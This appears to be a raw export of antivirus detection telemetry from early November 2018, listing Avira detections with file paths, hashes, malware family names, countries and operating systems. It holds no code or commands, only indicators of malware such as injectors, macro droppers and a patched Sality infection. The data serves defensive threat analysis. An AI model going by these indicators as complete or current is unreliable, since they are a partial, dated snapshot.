  Row(detection=Row(filename='avscan-20181102-060030-92f3f223', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060030-92F3F223', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053047-6c32a262', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053047-6C32A262', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055100-3f3637df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055100-3F3637DF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055014-23716fbf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055014-23716FBF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052010-f06b8359', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052010-F06B8359', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062051-6aae6d79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062051-6AAE6D79', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053640-3ec217e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053640-3EC217E7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050938-77a8c378', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050938-77A8C378', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052138-24b7f50c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052138-24B7F50C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050447-ca939679', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050447-CA939679', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054754-d06d11f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054754-D06D11F3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061626-cc6bfcd2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061626-CC6BFCD2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060226-d832ef1a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060226-D832EF1A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055348-a345a7e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055348-A345A7E3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055148-5b9f55d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055148-5B9F55D1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062132-833d802c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062132-833D802C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050456-cfcf3d6f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050456-CFCF3D6F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055505-d1122b59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055505-D1122B59', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055302-87d319a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055302-87D319A2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060936-d80cd8f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060936-D80CD8F2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051123-b61d283b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051123-B61D283B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052646-dc328254', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052646-DC328254', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T03:39:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050528-e2c77b44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050528-E2C77B44', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053703-4c7a6221', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053703-4C7A6221', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050621-022cbdb7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050621-022CBDB7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062616-2c29d7f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062616-2C29D7F1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060005-83d39bca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060005-83D39BCA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055703-17cc6246', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055703-17CC6246', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T06:55:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:31:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060944-dd10f5dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060944-DD10F5DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062315-c07df4d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062315-C07DF4D4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050611-fc20f38a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050611-FC20F38A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052519-a8cf3bb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052519-A8CF3BB9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055806-3d0e3e32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055806-3D0E3E32', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T17:28:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054831-e691eac4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054831-E691EAC4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060652-76a95c54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060652-76A95C54', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062601-2367c4ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062601-2367C4FF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060118-af6d4f64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060118-AF6D4F64', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062439-f2588f80', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062439-F2588F80', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052050-087e6796', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052050-087E6796', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-200222-ce1eec28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c5ba033c\\AVSCAN-20181101-200201-CA0A4266\\AVSCAN-20181101-200222-CE1EEC28', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:02:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~pp9242.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~pp9242.tmp', filesize=128000, name='HEUR/AGEN.1030705.#M1.#R1'), hash='3dfb3bcd7618c2bc34a4b30c7062e1d0204afe188d4c326613667d5c1ce30a25', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:15:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='training kebijakan perusahaan.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\DOKUMENTASI\\FOTO TRAINING KEBIJAKAN PERUSAHAAN\\TRAINING KEBIJAKAN PERUSAHAAN.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155450-377b39ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155450-377B39BA', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:13:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:26:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T03:10:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:31:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:16:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155146-9700f660', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155146-9700F660', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T00:42:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T11:43:37Z'), dt=datetime.date(2018, 11, 1)),
